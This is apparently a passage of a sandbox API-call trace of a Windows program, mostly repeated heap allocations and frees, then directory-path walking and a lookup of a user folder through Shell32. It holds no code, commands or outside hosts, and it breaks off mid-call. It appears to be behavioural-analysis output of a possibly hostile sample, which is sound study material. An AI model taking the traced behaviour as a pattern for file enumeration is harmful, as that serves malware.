HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.896] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0093.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.896] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.896] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.896] PathFindFileNameW (pszPath="") returned="" [0093.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.897] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.898] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x335e120 [0093.898] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x335e120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0093.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.899] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x335e120 | out: hHeap=0x630000) returned 1 [0093.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 